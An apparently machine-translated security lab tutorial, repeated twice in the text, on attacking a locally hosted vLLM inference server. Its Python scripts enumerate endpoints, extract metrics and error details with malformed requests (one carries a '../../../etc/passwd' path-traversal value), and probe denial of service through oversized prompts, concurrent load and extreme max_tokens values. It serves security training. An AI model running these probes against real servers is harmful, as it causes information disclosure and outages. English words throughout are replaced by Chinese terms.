實驗室: Inference Server 利用ation

Advanced7 min readUpdated 2026-03-15

攻擊 vLLM, TGI, and Triton inference servers to discover information disclosure vulnerabilities, denial-of-service vectors, and configuration weaknesses in model serving infrastructure.

lab inference-server infrastructure vllm triton

先備知識

Docker and Docker Compose installed
理解 of REST APIs and gRPC
Python with httpx, grpcio, and python-dotenv
Familiarity with model serving architectures

pip install httpx grpcio grpcio-tools aiohttp python-dotenv

Inference servers like vLLM, HuggingFace TGI, and NVIDIA Triton are the backbone of production LLM deployments. Their 攻擊面 extends beyond 模型 itself to include management APIs, health endpoints, metrics dashboards, and configuration interfaces that may expose sensitive information or enable denial of service.

Lab Exercises

Deploy a Vulnerable Inference Server

Set up a local vLLM instance with default configuration to serve as the attack target.

version: "3.8"
services:
  vllm:
    image: vllm/vllm-openai:latest
    ports:
      - "8000:8000"
    command: >
      --model TinyLlama/TinyLlama-1.1B-Chat-v1.0
      --max-model-len 2048
      --dtype float16
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: 1
              capabilities: [gpu]
    environment:
      - VLLM_LOGGING_LEVEL=DEBUG

docker compose up -d
# Wait for model to load
sleep 30
curl http://localhost:8000/health

Enumerate Exposed Endpoints

Discover and catalog all endpoints exposed by the 推論 server.

#!/usr/bin/env python3
"""Enumerate 推論 server endpoints for information disclosure."""
 
import httpx
 
BASE_URL = "http://localhost:8000"
 
# Common 推論 server endpoints across vLLM, TGI, and Triton
ENDPOINTS = [
    # vLLM endpoints
    "/health", "/v1/models", "/v1/completions", "/v1/chat/completions",
    "/metrics", "/version", "/tokenize", "/detokenize",
    # Common debug/management endpoints
    "/debug", "/config", "/status", "/info",
    "/v2/health/ready", "/v2/health/live",
    "/v2/models", "/v2/repository/index",
    # Metrics and 監控
    "/metrics/prometheus", "/stats", "/dashboard",
    # Documentation
    "/docs", "/redoc", "/openapi.json",
]
 
def enumerate_endpoints():
    results = {"accessible": [], "forbidden": [], "not_found": []}
 
    for endpoint in ENDPOINTS:
        try:
            resp = httpx.get(f"{BASE_URL}{endpoint}", timeout=5)
            if resp.status_code == 200:
                results["accessible"].append({
                    "path": endpoint,
                    "content_type": resp.headers.get("content-type", "unknown"),
                    "body_preview": resp.text[:200],
                })
            elif resp.status_code == 403:
                results["forbidden"].append(endpoint)
            else:
                results["not_found"].append(endpoint)
        except httpx.RequestError:
            results["not_found"].append(endpoint)
 
    print("=== Accessible Endpoints ===")
    for ep in results["accessible"]:
        print(f"  {ep['path']} [{ep['content_type']}]")
        print(f"    {ep['body_preview'][:100]}...")
 
    print(f"\n=== Forbidden: {len(results['forbidden'])} ===")
    print(f"=== Not Found: {len(results['not_found'])} ===")
 
    return results
 
if __name__ == "__main__":
    enumerate_endpoints()

python endpoint_enum.py

Extract Model and System Information

Use discovered endpoints to extract sensitive configuration details.

#!/usr/bin/env python3
"""Extract model and system information from 推論 server."""
 
import httpx
import json
 
BASE_URL = "http://localhost:8000"
 
def extract_model_info():
    """Extract model configuration and metadata."""
    print("=== Model Information ===")
 
    # Model list reveals model names, sizes, and configuration
    resp = httpx.get(f"{BASE_URL}/v1/models", timeout=5)
    if resp.status_code == 200:
        models = resp.json()
        print(f"Models: {json.dumps(models, indent=2)}")
 
    # OpenAPI schema reveals all available parameters
    resp = httpx.get(f"{BASE_URL}/openapi.json", timeout=5)
    if resp.status_code == 200:
        schema = resp.json()
        paths = list(schema.get("paths", {}).keys())
        print(f"\nAPI paths: {paths}")
 
def extract_metrics():
    """Extract Prometheus metrics for infrastructure intelligence."""
    print("\n=== Prometheus Metrics ===")
    resp = httpx.get(f"{BASE_URL}/metrics", timeout=5)
    if resp.status_code == 200:
        lines = resp.text.split("\n")
        interesting = [l for l in lines if any(
            k in l for k in ["gpu", "memory", "model", "cache", "queue", "batch"]
        ) and not l.startswith("#")]
        for line in interesting[:20]:
            print(f"  {line}")
 
def extract_error_info():
    """Trigger errors to extract stack traces and internal info."""
    print("\n=== Error Information Extraction ===")
 
    # Send malformed requests to trigger verbose errors
    payloads = [
        {"model": "nonexistent-model", "messages": [{"role": "user", "content": "測試"}]},
        {"model": "../../../etc/passwd", "prompt": "測試"},
        {"messages": [{"role": "system", "content": "A" * 100000}]},
    ]
 
    for payload in payloads:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json=payload, timeout=10,
            )
            if resp.status_code != 200:
                error_body = resp.text[:500]
                print(f"  Status {resp.status_code}: {error_body}")
        except Exception as e:
            print(f"  Exception: {e}")
 
if __name__ == "__main__":
    extract_model_info()
    extract_metrics()
    extract_error_info()

python info_extraction.py

Document all information disclosed through each endpoint.

測試 Denial-of-Service Vectors

識別 resource exhaustion and DoS vectors specific to 推論 servers.

#!/usr/bin/env python3
"""測試 denial-of-service vectors against 推論 server.
 
WARNING: Run only against local 測試 instances. Never against production."""
 
import httpx
import time
import threading
from concurrent.futures import ThreadPoolExecutor
 
BASE_URL = "http://localhost:8000"
 
def test_context_overflow():
    """測試 handling of max-context-length inputs."""
    print("=== Context Overflow 測試 ===")
    long_prompt = "Repeat this. " * 10000  # Exceed 上下文視窗
    try:
        start = time.time()
        resp = httpx.post(
            f"{BASE_URL}/v1/chat/completions",
            json={
                "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                "messages": [{"role": "user", "content": long_prompt}],
                "max_tokens": 10,
            },
            timeout=30,
        )
        elapsed = time.time() - start
        print(f"  Status: {resp.status_code} ({elapsed:.1f}s)")
        print(f"  Response: {resp.text[:200]}")
    except Exception as e:
        print(f"  Error: {e}")
 
def test_concurrent_load():
    """測試 server behavior under concurrent request load."""
    print("\n=== Concurrent Load 測試 ===")
 
    def make_request(i):
        try:
            start = time.time()
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": f"Count to {i}"}],
                    "max_tokens": 100,
                },
                timeout=60,
            )
            elapsed = time.time() - start
            return {"id": i, "status": resp.status_code, "latency": elapsed}
        except Exception as e:
            return {"id": i, "status": "error", "error": str(e)}
 
    # Gradually increase concurrency
    for concurrent in [5, 10, 20]:
        with ThreadPoolExecutor(max_workers=concurrent) as executor:
            start = time.time()
            futures = [executor.submit(make_request, i) for i in range(concurrent)]
            results = [f.result() for f in futures]
            total = time.time() - start
 
            errors = sum(1 for r in results if r["status"] != 200)
            avg_latency = sum(
                r.get("latency", 0) for r in results if r["status"] == 200
            ) / max(1, concurrent - errors)
 
            print(f"  Concurrent={concurrent}: errors={errors}, "
                  f"avg_latency={avg_latency:.1f}s, total={total:.1f}s")
 
def test_max_tokens_abuse():
    """測試 behavior with extreme max_tokens values."""
    print("\n=== Max Tokens Abuse ===")
    for max_tokens in [1, 100, 10000, 100000, -1, 0]:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": "Hi"}],
                    "max_tokens": max_tokens,
                },
                timeout=30,
            )
            print(f"  max_tokens={max_tokens}: status={resp.status_code}")
        except Exception as e:
            print(f"  max_tokens={max_tokens}: error={e}")
 
if __name__ == "__main__":
    test_context_overflow()
    test_concurrent_load()
    test_max_tokens_abuse()

python dos_vectors.py

Troubleshooting

Issue	Solution
Docker container fails to start	Verify GPU drivers and NVIDIA container toolkit installation
No GPU available	Use CPU-only mode by removing GPU configuration from docker-compose
Server returns 503 during tests	模型 may still be loading; wait longer after startup
Metrics endpoint not found	Different server versions expose metrics at different paths

參考文獻

"vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention" - Kwon et al. (2023) - Architecture of the vLLM 推論 server
"安全 Analysis of ML Inference Servers" - Chen et al. (2024) - 安全評估 of common 推論 frameworks
"Denial of Service 攻擊 on Machine Learning Systems" - Shumailov et al. (2021) - DoS vectors specific to ML infrastructure
"MLSecOps: Securing ML Model Serving Pipelines" - Kumar et al. (2024) - 安全 best practices for 推論 infrastructure

Knowledge Check

Why are 推論 server endpoints a 安全 concern even when the underlying model is well-aligned?

實驗室: Inference Server 利用ation

Advanced7 min readUpdated 2026-03-15

攻擊 vLLM, TGI, and Triton inference servers to discover information disclosure vulnerabilities, denial-of-service vectors, and configuration weaknesses in model serving infrastructure.

lab inference-server infrastructure vllm triton

先備知識

Docker and Docker Compose installed
理解 of REST APIs and gRPC
Python with httpx, grpcio, and python-dotenv
Familiarity with model serving architectures

pip install httpx grpcio grpcio-tools aiohttp python-dotenv

Background

Lab Exercises

Deploy a Vulnerable Inference Server

Set up a local vLLM instance with default configuration to serve as the attack target.

version: "3.8"
services:
  vllm:
    image: vllm/vllm-openai:latest
    ports:
      - "8000:8000"
    command: >
      --model TinyLlama/TinyLlama-1.1B-Chat-v1.0
      --max-model-len 2048
      --dtype float16
    deploy:
      resources:
        reservations:
          devices:
            - driver: nvidia
              count: 1
              capabilities: [gpu]
    environment:
      - VLLM_LOGGING_LEVEL=DEBUG

docker compose up -d
# Wait for model to load
sleep 30
curl http://localhost:8000/health

Enumerate Exposed Endpoints

Discover and catalog all endpoints exposed by the 推論 server.

#!/usr/bin/env python3
"""Enumerate 推論 server endpoints for information disclosure."""
 
import httpx
 
BASE_URL = "http://localhost:8000"
 
# Common 推論 server endpoints across vLLM, TGI, and Triton
ENDPOINTS = [
    # vLLM endpoints
    "/health", "/v1/models", "/v1/completions", "/v1/chat/completions",
    "/metrics", "/version", "/tokenize", "/detokenize",
    # Common debug/management endpoints
    "/debug", "/config", "/status", "/info",
    "/v2/health/ready", "/v2/health/live",
    "/v2/models", "/v2/repository/index",
    # Metrics and 監控
    "/metrics/prometheus", "/stats", "/dashboard",
    # Documentation
    "/docs", "/redoc", "/openapi.json",
]
 
def enumerate_endpoints():
    results = {"accessible": [], "forbidden": [], "not_found": []}
 
    for endpoint in ENDPOINTS:
        try:
            resp = httpx.get(f"{BASE_URL}{endpoint}", timeout=5)
            if resp.status_code == 200:
                results["accessible"].append({
                    "path": endpoint,
                    "content_type": resp.headers.get("content-type", "unknown"),
                    "body_preview": resp.text[:200],
                })
            elif resp.status_code == 403:
                results["forbidden"].append(endpoint)
            else:
                results["not_found"].append(endpoint)
        except httpx.RequestError:
            results["not_found"].append(endpoint)
 
    print("=== Accessible Endpoints ===")
    for ep in results["accessible"]:
        print(f"  {ep['path']} [{ep['content_type']}]")
        print(f"    {ep['body_preview'][:100]}...")
 
    print(f"\n=== Forbidden: {len(results['forbidden'])} ===")
    print(f"=== Not Found: {len(results['not_found'])} ===")
 
    return results
 
if __name__ == "__main__":
    enumerate_endpoints()

python endpoint_enum.py

Extract Model and System Information

Use discovered endpoints to extract sensitive configuration details.

#!/usr/bin/env python3
"""Extract model and system information from 推論 server."""
 
import httpx
import json
 
BASE_URL = "http://localhost:8000"
 
def extract_model_info():
    """Extract model configuration and metadata."""
    print("=== Model Information ===")
 
    # Model list reveals model names, sizes, and configuration
    resp = httpx.get(f"{BASE_URL}/v1/models", timeout=5)
    if resp.status_code == 200:
        models = resp.json()
        print(f"Models: {json.dumps(models, indent=2)}")
 
    # OpenAPI schema reveals all available parameters
    resp = httpx.get(f"{BASE_URL}/openapi.json", timeout=5)
    if resp.status_code == 200:
        schema = resp.json()
        paths = list(schema.get("paths", {}).keys())
        print(f"\nAPI paths: {paths}")
 
def extract_metrics():
    """Extract Prometheus metrics for infrastructure intelligence."""
    print("\n=== Prometheus Metrics ===")
    resp = httpx.get(f"{BASE_URL}/metrics", timeout=5)
    if resp.status_code == 200:
        lines = resp.text.split("\n")
        interesting = [l for l in lines if any(
            k in l for k in ["gpu", "memory", "model", "cache", "queue", "batch"]
        ) and not l.startswith("#")]
        for line in interesting[:20]:
            print(f"  {line}")
 
def extract_error_info():
    """Trigger errors to extract stack traces and internal info."""
    print("\n=== Error Information Extraction ===")
 
    # Send malformed requests to trigger verbose errors
    payloads = [
        {"model": "nonexistent-model", "messages": [{"role": "user", "content": "測試"}]},
        {"model": "../../../etc/passwd", "prompt": "測試"},
        {"messages": [{"role": "system", "content": "A" * 100000}]},
    ]
 
    for payload in payloads:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json=payload, timeout=10,
            )
            if resp.status_code != 200:
                error_body = resp.text[:500]
                print(f"  Status {resp.status_code}: {error_body}")
        except Exception as e:
            print(f"  Exception: {e}")
 
if __name__ == "__main__":
    extract_model_info()
    extract_metrics()
    extract_error_info()

python info_extraction.py

Document all information disclosed through each endpoint.

測試 Denial-of-Service Vectors

識別 resource exhaustion and DoS vectors specific to 推論 servers.

#!/usr/bin/env python3
"""測試 denial-of-service vectors against 推論 server.
 
WARNING: Run only against local 測試 instances. Never against production."""
 
import httpx
import time
import threading
from concurrent.futures import ThreadPoolExecutor
 
BASE_URL = "http://localhost:8000"
 
def test_context_overflow():
    """測試 handling of max-context-length inputs."""
    print("=== Context Overflow 測試 ===")
    long_prompt = "Repeat this. " * 10000  # Exceed 上下文視窗
    try:
        start = time.time()
        resp = httpx.post(
            f"{BASE_URL}/v1/chat/completions",
            json={
                "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                "messages": [{"role": "user", "content": long_prompt}],
                "max_tokens": 10,
            },
            timeout=30,
        )
        elapsed = time.time() - start
        print(f"  Status: {resp.status_code} ({elapsed:.1f}s)")
        print(f"  Response: {resp.text[:200]}")
    except Exception as e:
        print(f"  Error: {e}")
 
def test_concurrent_load():
    """測試 server behavior under concurrent request load."""
    print("\n=== Concurrent Load 測試 ===")
 
    def make_request(i):
        try:
            start = time.time()
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": f"Count to {i}"}],
                    "max_tokens": 100,
                },
                timeout=60,
            )
            elapsed = time.time() - start
            return {"id": i, "status": resp.status_code, "latency": elapsed}
        except Exception as e:
            return {"id": i, "status": "error", "error": str(e)}
 
    # Gradually increase concurrency
    for concurrent in [5, 10, 20]:
        with ThreadPoolExecutor(max_workers=concurrent) as executor:
            start = time.time()
            futures = [executor.submit(make_request, i) for i in range(concurrent)]
            results = [f.result() for f in futures]
            total = time.time() - start
 
            errors = sum(1 for r in results if r["status"] != 200)
            avg_latency = sum(
                r.get("latency", 0) for r in results if r["status"] == 200
            ) / max(1, concurrent - errors)
 
            print(f"  Concurrent={concurrent}: errors={errors}, "
                  f"avg_latency={avg_latency:.1f}s, total={total:.1f}s")
 
def test_max_tokens_abuse():
    """測試 behavior with extreme max_tokens values."""
    print("\n=== Max Tokens Abuse ===")
    for max_tokens in [1, 100, 10000, 100000, -1, 0]:
        try:
            resp = httpx.post(
                f"{BASE_URL}/v1/chat/completions",
                json={
                    "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0",
                    "messages": [{"role": "user", "content": "Hi"}],
                    "max_tokens": max_tokens,
                },
                timeout=30,
            )
            print(f"  max_tokens={max_tokens}: status={resp.status_code}")
        except Exception as e:
            print(f"  max_tokens={max_tokens}: error={e}")
 
if __name__ == "__main__":
    test_context_overflow()
    test_concurrent_load()
    test_max_tokens_abuse()

python dos_vectors.py

Troubleshooting

Issue	Solution
Docker container fails to start	Verify GPU drivers and NVIDIA container toolkit installation
No GPU available	Use CPU-only mode by removing GPU configuration from docker-compose
Server returns 503 during tests	模型 may still be loading; wait longer after startup
Metrics endpoint not found	Different server versions expose metrics at different paths

參考文獻

"vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention" - Kwon et al. (2023) - Architecture of the vLLM 推論 server
"安全 Analysis of ML Inference Servers" - Chen et al. (2024) - 安全評估 of common 推論 frameworks
"Denial of Service 攻擊 on Machine Learning Systems" - Shumailov et al. (2021) - DoS vectors specific to ML infrastructure
"MLSecOps: Securing ML Model Serving Pipelines" - Kumar et al. (2024) - 安全 best practices for 推論 infrastructure

Knowledge Check

Why are 推論 server endpoints a 安全 concern even when the underlying model is well-aligned?

實驗室: Inference Server 利用ation

先備知識

Background

Lab Exercises

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

測試 Denial-of-Service Vectors

Troubleshooting

相關主題

參考文獻

實驗室: Inference Server 利用ation

先備知識

Background

Lab Exercises

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

測試 Denial-of-Service Vectors

Troubleshooting

相關主題

參考文獻

實驗室: Inference Server 利用ation

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

測試 Denial-of-Service Vectors

Related articles

實驗室: Inference Server 利用ation

Deploy a Vulnerable Inference Server

Enumerate Exposed Endpoints

Extract Model and System Information

測試 Denial-of-Service Vectors

Related articles